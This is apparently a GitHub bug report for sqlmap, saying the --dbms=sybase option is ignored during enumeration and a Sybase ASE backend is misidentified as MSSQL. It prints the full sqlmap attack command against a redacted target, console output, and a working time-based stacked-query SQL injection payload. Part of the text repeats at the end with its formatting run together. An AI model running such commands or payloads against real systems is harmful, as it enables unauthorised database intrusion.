What's the problem?
While the --dbms option limits the tests attempted to identify injection points, sqlmap may ignore it after identifying injection points and beginning enumeration.
Do you have an idea for a solution?
If the --dbms option is set, confirming the chosen DBMS should be attempted before other DBMSes, and ideally a warning should be issued if confirmation of the chosen DBMS fails.
How can we reproduce the issue?
The following command was run against a vulnerable web application with a Sybase ASE backend database, and sqlmap determined the backend database was MSSQL:
./sqlmap.py -u 'https://XXX/XXX/XXX.asp' --data='search_string=test' --dbms=sybase --risk=2 --level=2 --technique=S -a
What are the running context details?
- Installation method:
git clone
- Client OS: Kali Rolling
- Program version:
1.1.7.27#dev
- Target DBMS:
Adaptive Server Enterprise/15.0.2/EBF 15679 ESD#5/P/Sun_svr4/OS 5.8/ase1502/2528/64-bit/FBO/Tue Jun 17 17:24:07 2008
- Detected WAF/IDS/IPS protection: None
- SQLi techniques found by sqlmap: Microsoft SQL Server/Sybase stacked queries (comment)
- Results of manual target assessment: Removing
plugins/dbms/mssqlserver and references to the same in lib/controller/handler.py allowed exploitation of the backend ASE database
- Relevant console output (if any):
[15:47:35] [INFO] testing connection to the target URL
[15:47:35] [INFO] checking if the target is protected by some kind of WAF/IPS/IDS
[15:47:35] [WARNING] heuristic (basic) test shows that POST parameter 'search_string' might not be injectable
[15:47:35] [INFO] testing for SQL injection on POST parameter 'search_string'
[15:47:35] [INFO] testing 'Microsoft SQL Server/Sybase stacked queries (comment)'
[15:47:35] [WARNING] time-based comparison requires larger statistical model, please wait............................ (done)
[15:47:47] [INFO] POST parameter 'search_string' appears to be 'Microsoft SQL Server/Sybase stacked queries (comment)' injectable
for the remaining tests, do you want to include all tests for '['Microsoft SQL Server', 'Sybase']' extending provided level (2) and risk (2) values? [Y/n] n
[15:47:52] [INFO] checking if the injection point on POST parameter 'search_string' is a false positive
POST parameter 'search_string' is vulnerable. Do you want to keep testing the others (if any)? [y/N]
sqlmap identified the following injection point(s) with a total of 49 HTTP(s) requests:
---
Parameter: search_string (POST)
Type: stacked queries
Title: Microsoft SQL Server/Sybase stacked queries (comment)
Payload: search_string=test';WAITFOR DELAY '0:0:5'--
---
[15:48:21] [INFO] testing Microsoft SQL Server
[15:48:21] [WARNING] it is very important to not stress the network connection during usage of time-based payloads to prevent potential disruptions
do you want sqlmap to try to optimize value(s) for DBMS delay responses (option '--time-sec')? [Y/n]
[15:48:29] [INFO] confirming Microsoft SQL Server
[15:48:30] [INFO] the back-end DBMS is Microsoft SQL Server
[15:48:30] [INFO] fetching banner
[15:48:30] [INFO] retrieved:
web server operating system: Windows 2008 R2 or 7
web application technology: ASP.NET, Microsoft IIS 7.5, ASP
back-end DBMS: Microsoft SQL Server Unknown
[15:48:30] [INFO] fetching banner
[15:48:30] [INFO] retrieved:
[15:48:30] [WARNING] in case of continuous data retrieval problems you are advised to try a switch '--no-cast' or switch '--hex'
banner: None
[15:48:30] [INFO] fetching current user
[15:48:30] [INFO] retrieved:
current user: None
[15:48:30] [INFO] fetching current database
[15:48:30] [INFO] retrieved:
current database: None
[15:48:31] [INFO] fetching server hostname
[15:48:31] [INFO] retrieved:
hostname: None
[15:48:31] [INFO] testing if current user is DBA
current user is DBA: False
[15:48:31] [INFO] fetching database users
[15:48:31] [INFO] fetching number of database users
[15:48:31] [WARNING] (case) time-based comparison requires larger statistical model, please wait.............................. (done)
[15:48:32] [CRITICAL] unable to retrieve the number of database users
[15:48:32] [WARNING] HTTP error codes detected during run:
500 (Internal Server Error) - 62 times
[*] shutting down at 15:48:32
What's the problem?
While the
--dbmsoption limits the tests attempted to identify injection points, sqlmap may ignore it after identifying injection points and beginning enumeration.Do you have an idea for a solution?
If the
--dbmsoption is set, confirming the chosen DBMS should be attempted before other DBMSes, and ideally a warning should be issued if confirmation of the chosen DBMS fails.How can we reproduce the issue?
The following command was run against a vulnerable web application with a Sybase ASE backend database, and sqlmap determined the backend database was MSSQL:
./sqlmap.py -u 'https://XXX/XXX/XXX.asp' --data='search_string=test' --dbms=sybase --risk=2 --level=2 --technique=S -aWhat are the running context details?
git clone1.1.7.27#devAdaptive Server Enterprise/15.0.2/EBF 15679 ESD#5/P/Sun_svr4/OS 5.8/ase1502/2528/64-bit/FBO/Tue Jun 17 17:24:07 2008plugins/dbms/mssqlserverand references to the same inlib/controller/handler.pyallowed exploitation of the backend ASE database